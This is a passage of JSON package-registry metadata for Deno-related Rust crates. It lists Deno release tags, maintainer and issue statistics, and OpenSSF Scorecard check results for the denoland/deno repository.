enoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:51:35.745Z","dependent_packages_count":3,"downloads":939291,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":7.005841313473864,"dependent_repos_count":16.5399651664312,"dependent_packages_count":9.159883090769103,"stargazers_count":22.108810496977487,"forks_count":16.898976838738125,"docker_downloads_count":null,"average":14.342695381277958},"purl":"pkg:cargo/deno_npm","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-04-06T15:06:46.432Z","updated_at":"2023-04-06T15:06:46.432Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T21:41:11.276Z","updated_at":"2023-07-18T21:41:11.276Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8042165,"name":"deno_cache_dir","ecosystem":"cargo","description":"Cache directory logic used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":67,"first_release_published_at":"2023-08-07T16:38:10.736Z","latest_release_published_at":"2026-08-06T11:46:30.770Z","latest_release_number":"0.49.0","last_synced_at":"2026-08-29T21:57:49.953Z","created_at":"2023-08-07T16:41:54.044Z","updated_at":"2026-08-29T21:57:49.953Z","registry_url":"https://crates.io/crates/deno_cache_dir/","install_command":"cargo install deno_cache_dir","documentation_url":"https://docs.rs/deno_cache_dir/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: 